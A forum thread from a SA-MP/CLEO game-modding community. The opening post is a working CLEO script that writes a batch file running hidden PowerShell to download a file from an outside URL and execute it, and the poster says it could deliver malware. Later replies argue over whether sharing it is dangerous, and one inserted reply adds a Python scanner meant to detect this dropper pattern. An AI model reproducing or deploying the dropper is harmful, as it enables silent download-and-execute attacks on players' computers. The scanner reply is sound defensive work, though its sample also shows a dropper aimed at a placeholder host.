[Presentation] Command line functionality

The code below creates and executes a batch file with instructions to download an image and execute it immediately. The interesting part is that it could also be used for any other application, like malware for example, or to do some damage to the PC directly from the command line.

Tested with:
-Cleo 4.1
-Sampfuncs 5.3.1
-Samp 0.3.7


Code:
/*
The code seems more complex than the actual working mechanism because of the "wooden" string handling. It seems that the "0A9E: writefile" opcode doesn't work if a string pointer is used, so the string is cut and written to the file step by step. Also it seems that using too long strings causes the code to ignore them, so that's why there are multiple "@write_file" calls instead of one call with a single long string.
*/

{$CLEO .cs}
0000: NOP

repeat
wait 50
until 0AFA: is_samp_structures_available

0A9A: 1@ = openfile "file.bat" mode "wt+"  // IF and SET

alloc 2@ 500
format 2@ "powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'http:/" //part of the link
call @write_file 2 file 1@ string 2@
format 2@ "/motherboard-images.vice.com/content-images/article/20733/1428578997900669.jpg'; " //link
call @write_file 2 file 1@ string 2@
format 2@ "$file = 'pic.jpg'; $down.DownloadFile($url,$file); "  // 'pic.jpg' is the name the file will have when saved
call @write_file 2 file 1@ string 2@
format 2@ "$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"  //executes the file
call @write_file 2 file 1@ string 2@

0A9B: closefile 1@

         
//by springfield      
0AA2: 0@ = "shell32.dll"
if 0AA4: 0@ = "ShellExecuteA" 0@
then
   0AA7: 0@ push 6 pop 1 params 1 0 0 "file.bat" 0 0 error_code 1@  
   if 1@ <= 32
   then 
   printf "FAILURE: %d" 1000 1@
   end
end
//by springfield 


0A93: end_custom_thread


:write_file
0C17: 31@ = strlen 1@
alloc 24@ 150

while 31@ >= 16
    wait 0
    0C24: strncpy destination 24@ source 1@ size 16
    
    format 25@v "%s" 24@
    chatmsg "%s %d" -1 25@v 31@
    0A9E: writefile 0@ size 16 from 25@v
    
    1@ += 16
    0C17: 31@ = strlen 1@                
end

if 31@ > 0
then
    format 25@v "%s" 1@
    chatmsg "%s %d" -1 25@v 31@
    0A9E: writefile 0@ size 31@ from 25@v
end

ret 0
 

PlasticBottle (Active member, joined Jul 13, 2016, 162 messages, 1 reaction score):
You are crazy for sharing this; as Mila said, prepare for CLEO malware...
 

Opcode.eXe (Expert, joined Feb 18, 2013, 1,486 messages, 227 reaction score, location ( ͡° ͜ʖ ͡°)):
YAY! Let's make public something everyone kept private to protect the normies!
Bad idea m8

// next a stealer? gg, aren't we against this kind of stuff?
 

monday (Expert, joined Jun 23, 2014, 1,126 messages, 1 solution, 158 reaction score):
guys, I really believe it could have a positive impact; I'll try to justify it when I defeat the alcohol (max 4 days ;p). Pls don't delete, thanks
 

0x_ (Administrator, "Wtf I'm not new....", joined Feb 18, 2013, 1,118 messages, 166 reaction score):
I made a mod already to protect users against this and more, it needs some refining then I'll release it open source probably also.
 

Forever15 (Expert, joined Dec 31, 2015, 510 messages, 12 reaction score):
@0x688 ohh, is it ASI? The mod u created? To protect the user?
 

mistery (Well-known member, joined Apr 23, 2014, 262 messages, 5 reaction score):
yes, but who will try a CLEO which has "open .bat" and "http://.." inside lol...
anyways, time to find a good decrypter :} if u know what I mean
 
(poster name not captured; joined Feb 18, 2005, 2,963 messages, 267 reaction score):
I don't see the point in thinking this is dangerous.

We have known that 'stealers' and keyloggers exist in CLEO since some years ago (there are some sources posted on this forum actually, HERE), which would steal passwords from SA-MP dialogs, PINs from textdraws etc.

I doubt that anybody (mostly Russians) who tangled with such things, considering they were using Win APIs like InternetConnect, HttpSendRequest etc., didn't think of using the same exact thing as here, to download/run/install some kind of malware.

CLEOs that are posted in the RELEASE section are usually decrypted (if needed) and manually checked before being approved.
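The manual check described above, and the string splitting the first post explains (the "0A9E: writefile" chunks mean "http://" never appears on one line), are what the scanner below targets. It is an added example, not code from the thread or from any poster's mod: it takes decompiled CLEO text in the Sanny Builder syntax used in the first post, records the file, DLL and API opcodes the posted script relies on, reassembles consecutive format chunks per variable before matching payload strings, and returns a verdict. The two sample scripts are constructed for the example and use a placeholder host (example.invalid).

```python
import re

# Opcodes the posted script relies on: file write, DLL load, API lookup and call.
FILE_AND_API_OPCODES = {"0A9A": "openfile", "0A9E": "writefile", "0AA2": "load_library",
                        "0AA4": "get_proc_address", "0AA7": "call_function"}
# Substrings that mark a download-and-run payload; matched case-insensitively.
PAYLOAD_MARKERS = ("powershell", "downloadfile", "shellexecute", "http://", ".bat", "shell32.dll")
OPCODE_RE = re.compile(r"\b([0-9A-Fa-f]{4}):")
FORMAT_RE = re.compile(r'^\s*format\s+(\d+@v?)\s+"([^"]*)"', re.IGNORECASE)
QUOTED_RE = re.compile(r'"([^"]*)"')

def scan_cleo_source(text):
    """Scan decompiled CLEO text; return (opcodes_seen, markers_seen, suspicious)."""
    opcodes_seen, buffers, literals = set(), {}, []
    for line in text.splitlines():
        m = OPCODE_RE.search(line)
        if m and m.group(1).upper() in FILE_AND_API_OPCODES:
            opcodes_seen.add(m.group(1).upper())
        f = FORMAT_RE.match(line)
        if f:
            # Reassemble chunks formatted into one variable: the posted script splits
            # "http://" into "http:/" + "/...", so a per-line grep never sees it whole.
            buffers[f.group(1)] = buffers.get(f.group(1), "") + f.group(2)
        else:
            literals.extend(QUOTED_RE.findall(line))
    haystack = " ".join(list(buffers.values()) + literals).lower()
    markers_seen = {marker for marker in PAYLOAD_MARKERS if marker in haystack}
    # Verdict: a file is written, an external API is called, and payload markers appear.
    suspicious = (bool({"0A9A", "0A9E"} & opcodes_seen) and "0AA7" in opcodes_seen
                  and len(markers_seen) >= 2)
    return opcodes_seen, markers_seen, suspicious

def per_line_hits(text, marker):
    """Naive per-line search, kept only to show what the chunk splitting hides."""
    return [ln for ln in text.splitlines() if marker in ln.lower()]

# Constructed samples (not the thread's script): dropper-shaped with a placeholder host, and benign.
DROPPER_SAMPLE = """\
0A9A: 1@ = openfile "file.bat" mode "wt+"
format 2@ "powershell.exe -nop -w hidden -c $url = 'http:/"
format 2@ "/example.invalid/pic.jpg'; $down.DownloadFile($url,$file);"
0AA2: 0@ = "shell32.dll"
if 0AA4: 0@ = "ShellExecuteA" 0@
0AA7: 0@ push 6 pop 1 params 1 0 0 "file.bat" 0 0 error_code 1@
"""
BENIGN_SAMPLE = """\
0A9A: 1@ = openfile "settings.ini" mode "wt+"
format 2@ "volume=%d" 5@
0A9E: writefile 1@ size 9 from 2@
"""
```

Calling scan_cleo_source on each sample flags the dropper-shaped one (all six markers, "http://" only visible after reassembly) and clears the benign writer even though it uses the same openfile/writefile opcodes.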
 

MrChristmas (Expert, joined Jul 29, 2014, 563 messages, 26 reaction score):
+ these days most of the users can decrypt most of the CLEOs by themselves and see if they are safe or not to use.
 

PlasticBottle (Active member, joined Jul 13, 2016, 162 messages, 1 reaction score):
Yeah, we can decrypt shit and everything, but it's not the case for "X_h4x0r1337_X" who comes here for the first time to download random shit (even though cleos in release are safe)
 

monday (Expert, joined Jun 23, 2014, 1,126 messages, 1 solution, 158 reaction score):
@PlasticBottle @Opcode.eXe @Forever15
sharing this has some nasty potential, but there's also a positive side to it. Tools like that are some sort of power. They are equivalent to real-life tools like a gun or a big muscle mass. While both can be used for immoral reasons, their general positive contribution shouldn't be neglected. I'd compare sharing this code with sharing a protein powder or sharing a tutorial on how to make a homemade gun for self-defence/counter-attack.

Personally I never considered using any kind of power for unprovoked abuse or malicious purposes, and I think that there are a lot of people like that, who squander as much power as they can through all their life hoping that someday, in a dangerous situation, it can be used for protection, protection even by means of some sort of counter-attack, which would require power like a gun, physical strength or offensive software.
 

PlasticBottle (Active member, joined Jul 13, 2016, 162 messages, 1 reaction score):
I guess you are right, and also nowadays there isn't as much malware as, like, 3 years ago. Even though we have powerful antiviruses etc., sharing this can be bad. It's like a double-edged sword; we will see how it turns out...
 